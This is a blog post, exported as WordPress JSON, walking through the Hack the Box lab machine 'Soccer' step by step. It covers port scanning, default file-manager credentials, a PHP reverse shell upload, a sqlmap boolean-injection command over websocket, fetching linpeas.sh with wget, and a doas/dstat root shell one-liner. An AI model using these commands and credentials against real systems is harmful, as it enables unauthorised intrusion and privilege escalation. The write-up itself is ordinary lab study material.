{"id":212,"date":"2023-06-23T21:24:29","date_gmt":"2023-06-24T03:24:29","guid":{"rendered":"https:\/\/rasulnazriev.tech\/?p=212"},"modified":"2023-06-27T18:04:20","modified_gmt":"2023-06-28T00:04:20","slug":"soccer-enumeration-and-exploitation","status":"publish","type":"post","link":"https:\/\/rasulnazriev.tech\/?p=212","title":{"rendered":"Soccer Enumeration And Exploitation"},"content":{"rendered":"\n

Hello everyone! This post is about enumerating and exploiting Soccer. No, not a soccer game, but a machine. Soccer is one of the retired machines on Hack the Box, it is a Linux machine with a web vulnerability. Let’s get into it! <\/p>\n\n\n\n

First things first, I should run Nmap (or a similar tool) against the machine to identify open ports and services. <\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

As can be seen, there is a weird 9091 open port along with a website and ssh. I had to manually link 10.10.11.194 to soccer.htb for DNS resolution. <\/p>\n\n\n\n

Secure Shell Version is OpenSSH 8.2p1 Ubuntu 4ubumtu0.5 (Ubuntu Linux; protocl 2.0 ). SSH host keys are found. As can be seen above, nginx\/1.18.0 is running. After poking around the static page about football, I run a gobuster with a big.txt <\/p>\n\n\n\n

gobuster dir -u http:\/\/soccer.htb -w \/usr\/share\/dirb\/wordlists\/big.txt<\/p>\n\n\n\n

<\/p>\n\n\n\n

to find any hidden directories\/pages. That being said, I found the only accessible page — \/tiny which is a tinypagefile login page. Simply by searching “tinypagefile” in the search engine, there are default credentials admin:admin@123 and user:user@1234 in GitHub or exploitDB that are worth trying.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

As simple as that, I got into a file manager. I would like to upload some php shell code and see if I am given any errors. Under tiny\/uploads I uploaded a php code successfully. Thus, it is possible to upload php reverse shell code. I got in as a www-data (I apologize, I forgot to take a screenshot), and searched running processes, but could not find the 9091 port. Therefore, my next step is to look into \/etc\/nginx for nginx configuration file, which contained a different version of the website — soc-player.soccer.htb<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

The above version looks exactly the same except there are Login and Sign Up pages. After unsuccessfully trying admin: admin credentials in the Login page, I went to Sign Up with some random email and password as shown below.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

After logging in with those credentials, there is the following page<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

I tried a random ticket number such as 12345, and it says that such a ticket does not exist. Afterward, I tried 91344 and it says such ticket exits. I also tried “91344 or 1=1”, and the ticket exists! That looks like a boolean-based injection. I would like to get the ticket through BurpSuite and use sqlmap to continue to enumerate and perhaps exploit the machine.<\/p><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Note: The ticket was updated saved the ticket ID in injection.req file for potential use. Now, it is time to use sqlmap. After poking around in the manual page for sqlmap, I typed sqlmap -u \u2018ws:\/\/soc-player.soccer.htb:9091\/\u2019 –data \u2018{“id”:”*”}\u2019 –technique=B –risk 3 –level 5 –batch –dbs –threads 10 to get all databases.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

The following databases were found.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

I am interested in soccer_db. So let’s search in that database with the above-shown command.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Nice! I can try login with the above credentials through ssh. <\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Nice! Now, it’s time to elevate my privileges. I run “python3 -m http.server” on my parrot machine with Linux privilege enumeration script already downloaded. On the @soccer machine, I run \u201cwget http:\/\/myIP:8000\/linpeas.sh<\/a> \u201d to upload the enumeration script. After that, I run .\/linpeas.sh which produces a bunch of output. What catches my eye though is the following.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

It is always worth looking at \u201cFiles with Interesting Permissions\u201d section first. Because I may find that user \u201cplayer\u201d may run some of those files as a root. I am particularly interested in \/usr\/local\/bin\/doas.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Let’s see what is inside doas.config<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

It does look like the player can run \/usr\/bin\/dstat as a root.<\/p>\n\n\n\n

After searching for what group the player owns, I found this.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

The player group is indeed the owner of dstat along with root. I might just drop a reverse shell code into dstat directory and try to execute it with doas command. I uploaded import os; os.execv(\"\/bin\/sh\", [\"sh\"])<\/code> into dstat_getroot.py(Note: I found it in GTFOBins how to upload a reverse to dstat) and I try to run the file the following:<\/p>\n\n\n\n

doas dstat –getroot or doas \/usr\/bin\/dstat –getroot<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

And I am root. <\/p>\n","protected":false},"excerpt":{"rendered":"

Hello everyone! This post is about enumerating and exploiting Soccer. No, not a soccer game, but a machine. Soccer is one of the retired machines on Hack the Box, it is a Linux machine with a web vulnerability. Let’s get into it! First things first, I should run Nmap (or a similar tool) against the […]<\/p>\n","protected":false},"author":1,"featured_media":260,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-212","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorised"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/rasulnazriev.tech\/index.php?rest_route=\/wp\/v2\/posts\/212","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/rasulnazriev.tech\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/rasulnazriev.tech\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/rasulnazriev.tech\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/rasulnazriev.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=212"}],"version-history":[{"count":32,"href":"https:\/\/rasulnazriev.tech\/index.php?rest_route=\/wp\/v2\/posts\/212\/revisions"}],"predecessor-version":[{"id":265,"href":"https:\/\/rasulnazriev.tech\/index.php?rest_route=\/wp\/v2\/posts\/212\/revisions\/265"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/rasulnazriev.tech\/index.php?rest_route=\/wp\/v2\/media\/260"}],"wp:attachment":[{"href":"https:\/\/rasulnazriev.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=212"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/rasulnazriev.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=212"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/rasulnazriev.tech\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=212"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}